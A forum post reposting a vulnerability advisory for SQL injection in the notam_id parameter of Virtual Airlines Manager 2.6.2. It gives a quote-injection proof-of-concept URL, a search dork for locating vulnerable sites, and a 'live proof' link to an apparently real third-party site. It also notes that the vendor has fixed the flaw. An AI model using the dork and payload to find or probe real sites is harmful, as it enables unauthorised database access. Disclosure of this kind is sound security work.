Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Virtual Airlines Manager 2.6.2 SQL Injection
#1
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
# Date: 2020-06-07
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: inurl:notam_id=
# Affected Version: 2.6.2
# Tested on: ParrotOS
# CVE : N/A

Vulnerable parameter
-------------------
notam_id=%27%27

Id parameter's value is going into sql query directly!

Proof of concept
---------------
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27

Live Proof: https://www.airliberiava.com/vam/index.p...d=11%27%27


Submitted: Jun 1 2020
Fixed: Jun 5 2020
Acknowledgement : https://ibb.co/Y3WYdFN
[Image: YobKHCg.gif]


Forum Jump:


Users browsing this thread: 1 Guest(s)